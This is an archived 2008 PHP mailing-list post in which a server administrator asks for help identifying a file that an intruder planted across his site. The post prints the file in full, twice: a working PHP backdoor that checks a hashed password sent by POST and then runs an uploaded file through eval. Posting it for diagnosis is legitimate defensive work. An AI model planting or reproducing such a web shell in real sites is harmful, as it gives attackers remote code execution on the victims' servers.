Hack question

---

• From: news@xxxxxxxxxxxxx (Al)
• Date: Wed, 16 Apr 2008 12:13:04 -0400

---

I'm still fighting my hack problem on one of my servers. Can anyone help me figure out what's the purpose of this code. The hack places this file in numerous dirs on the site, I assume using a php script because the owner is "nobody".

I can sort of figure what is doing; but, I can't figure out what the hacker is using it for.

Incidentally, I've changed all passwords and restricted ftp to two people. I see no sign that any code is written with by site owner, i.e, ftp. And, I've looked carefully for suspect php files.

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

<?php error_reporting(1);
global $HTTP_SERVER_VARS;
function say($t)
{
echo "$t\n";
} ;
function testdata($t)
{
say(md5("testdata_$t"));
} ;
echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == "aace99428c50dbe965acc93f3f275cd3")
{
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"), $HTTP_POST_FILES["f"]["size"]))
{
eval($code);
} else
{
testdata('f');
} ;
} else
{
testdata('pass');
} ;
testdata('end');
echo "</pre>";
?>

.

---

• Follow-Ups:
  • Re: [PHP] Hack question
    • From: Jim Lucas
  • Re: Hack question
    • From: Al
  • Re: Hack question
    • From: Al
  • Re: Hack question
    • From: gunnrosebutpeace
  • Re: [PHP] Hack question
    • From: Jim Lucas
  • Re: [PHP] Hack question
    • From: "Daniel Brown"
  • Re: [PHP] Hack question
    • From: "Greg Bowser"
  • Re: [PHP] Hack question
    • From: Aschwin Wesselius
  • Re: [PHP] Hack question
    • From: Aschwin Wesselius

• Prev by Date: Re: [PHP] Memory limit of 8 MB not enough
• Next by Date: Re: [PHP] Hack question
• Previous by thread: CMS with web service
• Next by thread: Re: [PHP] Hack question
• Index(es):
  • Date
  • Thread

---

Relevant Pages Re: Hack question ... One of our designers uploaded an infected css file for his application. ... I've changed all passwords and restricted ftp to two people. ... I see no sign that any code is written with by site owner, i.e, ftp. ... I've looked carefully for suspect php files. ... (php.general) Re: Hack question ... The code executes the script code, using eval, directly from the /tmp dir. So the usual security tests we do prior to using move_uploaded_fileare useless. ... I've changed all passwords and restricted ftp to two people. ... I see no sign that any code is written with by site owner, i.e, ftp. ... I've looked carefully for suspect php files. ... (php.general) Re: Hack question ... I've changed all passwords and restricted ftp to two people. ... code is written with by site owner, i.e, ftp. ... I've looked carefully for suspect php files. ...     else ... (php.general)

---

• Security
• UNIX
• Linux
• Coding
• Usenet

• Archive
• About
• Privacy
• Search
• Imprint

coding.derkeiler.com  > Archive  > PHP  > php.general  > 2008-04